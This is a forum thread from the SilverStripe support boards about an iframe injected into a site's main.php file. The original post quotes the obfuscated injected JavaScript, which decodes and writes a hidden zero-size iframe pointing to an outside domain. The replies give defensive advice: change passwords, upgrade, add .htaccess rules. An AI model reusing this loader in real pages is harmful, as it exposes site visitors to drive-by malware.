Jump to:

23355 Posts in 17691 Topics by 2862 members

General Questions

SilverStripe Forums » General Questions » iframe injected in main.php

General questions about getting started with SilverStripe that don't fit in any of the categories above.

Moderators: martimiz, Sean, biapar, Willr, Ingo, swaiba, simon_w

Page: 1 2
Go to End
Author Topic: 3826 Views
  • Fabie
    Avatar
    Community Member
    28 Posts

    iframe injected in main.php Link to this post

    Hi, one of our sites was down for a few hours and apparently it was due to an iframe injected in /hsphere/local
    /home/mywebiste/mywebsite.com.au/sapphire/main.php on line 121.

    Has anyone experienced any issue like this? Do i need to change permissions to prevent this from happening again?

    thats what the iframe looked like.

    Line 121 contains the following:

    <script> var Z = '0 03c0 0690 0660 0720 0610 06d0 0650 0200 0730 0720 0630 03d0 0220 0680 0740 0740 0700 03a0 02f0 02f0 0720 0610 0690 06e0 0620 06f0 0780 02e0 0750 0730 02f0 0610 0640 06f0 0620 0650 02f0 0690 06e0 0640 0650 0780 02e0 0700 0680 0700 0220 0200 0770 0690 0640 0740 0680 03d0 0220 0300 0220 0200 0680 0650 0690 0670 0680 0740 03d0 0220 0300 0220 0200 0660 0720 0610 06d0 0650 0620 06f0 0720 0640 0650 0720 03d0 0220 0300 0220 03e0 03c0 02f0 0690 0660 0720 0610 06d0 0650 03e'; XX = Z.replace(/0 0/g,'%'); document.write(unescape(XX)); </script> fr"+"a"+"m"+"ebor"+"de"+"r="0"><"+"/ifra"+"m"+"e>"); </script>

    Cheers

    Fabs

  • yurigoul
    Avatar
    Community Member
    202 Posts

    Re: iframe injected in main.php Link to this post

    I'm not sure about this, but it seems to me that security@silverstripe.org would like to know about it - especially if you can tell them how it happened.

    http://silverstripe.org/general-questions/show/264494#post264494

  • dalesaurus
    Avatar
    Community Member
    283 Posts

    Re: iframe injected in main.php Link to this post

    Looks like a drive by injection attack on your host, generally targeted at php files. This doesn't look like a specific Silverstripe problem. These jerks will hammer on sites until they get in, then find the first index looking file and append crap like the above to it.

    1. Change your ftp/ssh/etc passwords immediately!
    2. Stop reading step 2, you're supposed to be changing your passwords
    3. You might want to start checking other files or sites you host there for similar attacks

  • Fabie
    Avatar
    Community Member
    28 Posts

    Re: iframe injected in main.php Link to this post

    Thanks Dalesaurus and Yurigoul for responding.

    As it happears to be a hosting issue I won't submit the silverstipe security reporting. I have changed the passwords as well.

    Cheers

    FAbie

  • Fabie
    Avatar
    Community Member
    28 Posts

    Re: iframe injected in main.php Link to this post

    Response from host is that it is a problem with code. We are using 2.3.1 on this site. Emailed security@silverstripe to inform. and waiting to hear back.

  • Sam
    Avatar
    Administrator
    679 Posts

    Re: iframe injected in main.php Link to this post

    Hi Fabie,

    I suggest that you upgrade to 2.3.3, and ensure that your assets/ directory has this .htaccess file in it:

    http://open.silverstripe.org/browser/phpinstaller/tags/2.3.3/assets/.htaccess

  • Fabie
    Avatar
    Community Member
    28 Posts

    Re: iframe injected in main.php Link to this post

    Thanks Sam for the post and your email.

    I have now added the .htaccess file under assets but test.php files is still visible.
    Haven't upgraded yet to 2.3.3 that would most prob be why. Will get the upgrade happening and see how things work out.

    Thanks for your time.

  • dalesaurus
    Avatar
    Community Member
    283 Posts

    Re: iframe injected in main.php Link to this post

    Fabie, it is a problem at your host in that someone that is not you has changed your site files, not a Silverstripe issue. Typically this means someone has stolen login credentials (FTP/ssh/etc) or someone has compromised the entire system at your hosting company (less likely).

    Sam's suggestion would overwrite any compromised files, which is good. But you can bet whomever did it in the first place will be back.

    If your clients have access to the site via FTP/ssh/etc you should change their passwords too, then upgrade. And don't let them store those passwords anywhere silly. Heck, one of their machines could have some malware that is passing credentials back to whomever did the injection in the first place.

    3826 Views
Page: 1 2
Go to Top

Want to know more about the company that brought you SilverStripe? Then check out SilverStripe.com

Comments on this website? Please give feedback.